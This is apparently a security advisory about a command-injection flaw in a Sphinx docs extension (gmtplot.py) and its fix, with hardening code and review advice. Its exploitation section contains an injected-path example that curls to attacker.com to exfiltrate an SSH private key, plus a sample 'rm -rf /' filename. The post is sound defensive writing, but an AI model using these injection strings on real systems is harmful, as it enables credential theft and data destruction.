Shell Injection in Sphinx Extensions: How a Docs Tool Became a Security Risk
Severity: Critical | CVE Class: Command Injection (CWE-78) | Fixed In: PR - "fix: sanitize subprocess call in gmtplot.py"
Introduction
When developers think about attack surfaces, they typically focus on web endpoints, authentication systems, or data storage. Rarely does anyone look twice at the documentation pipeline. Yet documentation tooling — especially custom Sphinx extensions that process contributor-supplied content — can harbor some of the most dangerous vulnerabilities in a codebase.
This post covers a critical shell injection vulnerability discovered and fixed in gmtplot.py, a custom Sphinx extension used to render GMT (Generic Mapping Tools) plots in documentation. The vulnerability allowed an attacker with the ability to contribute RST documentation files to execute arbitrary shell commands on any machine that built the documentation.
If your CI/CD pipeline builds docs automatically — and most modern projects do — this means remote code execution on your build infrastructure.
The Vulnerability Explained
What Is Shell Injection?
Shell injection (also known as OS command injection) occurs when an application passes unsanitized, user-controlled data to a system shell interpreter. When Python's subprocess.run() is called with shell=True, the entire command string is handed to /bin/sh for interpretation. This means the shell will parse and execute any valid shell syntax embedded in the string — including metacharacters like:
| Metacharacter | Effect |
|---|---|
; |
Execute next command sequentially |
\| |
Pipe output to another command |
&& |
Execute next command if first succeeds |
` ` |
Command substitution (backticks) |
$() |
Command substitution (modern syntax) |
> / >> |
Redirect output to a file |
The Vulnerable Code
In docs/source/_extensions/gmtplot.py, at lines 173, 174, and 197, the extension invoked subprocess.run() like this:
# VULNERABLE CODE (before fix)
import subprocess
# ps_images[0] is derived from user-supplied RST documentation content
ps_file = ps_images[0]
# shell=True + unsanitized input = shell injection
subprocess.run(f"gmt psconvert {ps_file} -A -Tg", shell=True)
subprocess.run(f"gmt psconvert {ps_file} -A -Tf", shell=True)
# Also vulnerable at line 197
subprocess.run(f"convert {ps_file} output.png", shell=True)
The variable ps_images[0] is a file path derived from the processing of RST source files — content that documentation contributors control.
How Could It Be Exploited?
An attacker who can submit a pull request (or directly push to a branch) containing RST documentation files can craft a filename or directive that injects shell commands. Here's a concrete example:
Step 1: The attacker contributes an RST file containing a GMT plot directive with a malicious path:
.. gmtplot::
:caption: Innocent-looking map
# Script that generates a file with a dangerous name
Step 2: The extension processes this and constructs a path like:
legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) #
Step 3: When subprocess.run() executes with shell=True, the shell sees:
gmt psconvert legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) # -A -Tg
The shell dutifully executes both the legitimate GMT command and the attacker's injected command.
Real-World Impact
The consequences depend on the context in which documentation is built, but consider:
- CI/CD Compromise: Most projects auto-build docs in pipelines. A malicious PR could exfiltrate secrets, install backdoors, or pivot to internal infrastructure.
- Developer Machine Compromise: Any developer who checks out the branch and runs
make htmllocally becomes a victim. - Supply Chain Attack: If documentation is built as part of a release process, an attacker could tamper with build artifacts or inject malicious code into published packages.
- Secret Exfiltration: Build environments commonly contain API keys, cloud credentials, SSH keys, and deployment tokens — all accessible to injected commands.
This is not theoretical. Similar vulnerabilities have been exploited in CI/CD systems to steal secrets and compromise software supply chains.
The Fix
What Changed?
The fix eliminates the root cause by removing shell=True and passing command arguments as a list instead of a string. When subprocess.run() receives a list, Python uses execvp() to run the process directly — no shell is involved, and therefore no shell metacharacter interpretation occurs.
# FIXED CODE (after fix)
import subprocess
import shlex
# ps_images[0] is still user-derived, but now safely handled
ps_file = ps_images[0]
# Pass as a list — no shell involved, metacharacters are treated as literals
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tg"], check=True)
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tf"], check=True)
# Also fixed at line 197
subprocess.run(["convert", ps_file, "output.png"], check=True)
Why This Works
When you pass a list to subprocess.run():
- Python calls
os.execvp()(or equivalent) directly - The operating system treats each list element as a discrete argument
- No shell is spawned, so no shell parsing occurs
- A filename like
file.ps; rm -rf /is passed literally as the filename argument togmt psconvert— the semicolon is just a character, not a command separator
The attack is completely neutralized because the shell — the interpreter that gives metacharacters their power — is never invoked.
Additional Hardening (Defense in Depth)
Beyond the primary fix, consider these additional hardening measures:
import subprocess
import os
from pathlib import Path
def safe_convert(ps_file: str, output_dir: str) -> None:
"""Safely convert PS file with input validation."""
# 1. Validate the file exists and is within expected directory
ps_path = Path(ps_file).resolve()
allowed_base = Path(output_dir).resolve()
if not ps_path.is_relative_to(allowed_base):
raise ValueError(f"Path traversal detected: {ps_file}")
# 2. Validate file extension
if ps_path.suffix.lower() not in ('.ps', '.eps'):
raise ValueError(f"Unexpected file type: {ps_path.suffix}")
# 3. Use list form (no shell=True) — primary defense
result = subprocess.run(
["gmt", "psconvert", str(ps_path), "-A", "-Tg"],
capture_output=True,
text=True,
timeout=60, # 4. Add timeout to prevent resource exhaustion
check=True # 5. Raise on non-zero exit code
)
Prevention & Best Practices
The Golden Rule: Never Use shell=True with External Input
This is the single most important takeaway. Python's subprocess documentation itself warns:
"Using shell=True can be a security hazard... Do not use shell=True when the command string is constructed from external input."
Follow this decision tree:
Do you need shell features (pipes, redirects, globs)?
├── YES → Can you redesign to avoid them?
│ ├── YES → Redesign (preferred)
│ └── NO → Use shell=True ONLY with fully hardcoded strings
│ Never interpolate external data
└── NO → Always use shell=False (list form)
Input Validation and Allowlisting
When you must work with user-supplied paths or filenames, validate them strictly:
import re
from pathlib import Path
def validate_plot_filename(filename: str) -> bool:
"""Allowlist-based filename validation."""
# Only allow alphanumeric, hyphens, underscores, dots
if not re.match(r'^[a-zA-Z0-9_\-]+\.(ps|eps)$', filename):
return False
# Prevent path traversal
if '..' in filename or '/' in filename:
return False
return True
Use shlex.quote() as a Last Resort
If you absolutely cannot avoid shell=True, use shlex.quote() to escape arguments:
import shlex
import subprocess
# Last resort only — prefer list form instead
safe_path = shlex.quote(ps_file)
subprocess.run(f"gmt psconvert {safe_path} -A -Tg", shell=True)
⚠️ Warning: This is a mitigation, not a cure. The list-form approach is always preferred.
Relevant Security Standards
| Standard | Reference | Description |
|---|---|---|
| OWASP | A03:2021 – Injection | Injection ranks #3 in OWASP Top 10 |
| CWE | CWE-78 | OS Command Injection |
| CWE | CWE-88 | Argument Injection |
| SANS | CWE/SANS Top 25 | Most Dangerous Software Errors |
Detection Tools
Add these to your security pipeline to catch similar issues:
- Bandit — Python-specific SAST tool; detects
shell=Trueusage (ruleB602,B603)
bash pip install bandit bandit -r . -t B602,B603 - Semgrep — Pattern-based code scanning with rules for subprocess misuse
bash semgrep --config "p/python" . - CodeQL — GitHub's semantic code analysis; has built-in queries for command injection
- Safety — Scans Python dependencies for known vulnerabilities
- Pre-commit hooks — Run Bandit automatically before every commit
Secure Code Review Checklist
When reviewing code that invokes subprocesses, ask:
- [ ] Is
shell=Trueused? If so, is it absolutely necessary? - [ ] Does any part of the command string come from external input (files, environment, user input, network)?
- [ ] Are file paths validated against an allowlist of expected directories?
- [ ] Is there a timeout to prevent resource exhaustion?
- [ ] Are errors handled to prevent information leakage via exception messages?
- [ ] Is the principle of least privilege applied (does the process need all these permissions)?
A Note on Documentation Pipelines
This vulnerability highlights a frequently overlooked truth: your documentation pipeline is part of your attack surface.
Modern documentation workflows often include:
- Automatic builds triggered by pull requests from external contributors
- Sphinx extensions that execute code to generate examples and plots
- Jupyter notebooks rendered as documentation
- Auto-generated API docs that execute import statements
Each of these is a potential code execution vector. Treat your documentation build environment with the same security rigor as your production build:
- Sandbox doc builds in isolated environments with no access to production secrets
- Require review before building PRs from first-time contributors
- Use separate secret stores — doc build environments should not have the same credentials as release pipelines
- Audit custom Sphinx extensions — they often run with full filesystem and network access
Conclusion
A single shell=True in a documentation extension turned a benign plot-rendering tool into a potential remote code execution vulnerability. The fix was straightforward — replace string interpolation with a properly structured argument list — but the implications were significant.
Key takeaways:
shell=True+ user input = shell injection. This is one of the most reliable rules in security.- Documentation tooling is an attack surface. CI/CD pipelines that auto-build docs are especially at risk.
- The fix is simple: use
subprocess.run(["cmd", "arg1", "arg2"])instead ofsubprocess.run(f"cmd {arg}", shell=True). - Layer your defenses: input validation, path restrictions, and static analysis tools complement the primary fix.
- Automate detection: Bandit and Semgrep can catch these issues before they reach production.
Security vulnerabilities don't only live in authentication systems and API endpoints. They hide in build scripts, test helpers, and documentation generators — the parts of a codebase that developers trust implicitly. The best defense is consistent, skeptical review of any code that touches external input, regardless of how "internal" it seems.
Secure every layer. Trust no input.
This vulnerability was identified and fixed as part of an automated security scanning process. If you maintain Sphinx extensions or other documentation tooling that invokes subprocesses, audit your code for similar patterns today.
References: CWE-78 | OWASP Injection | Python subprocess docs | Bandit B602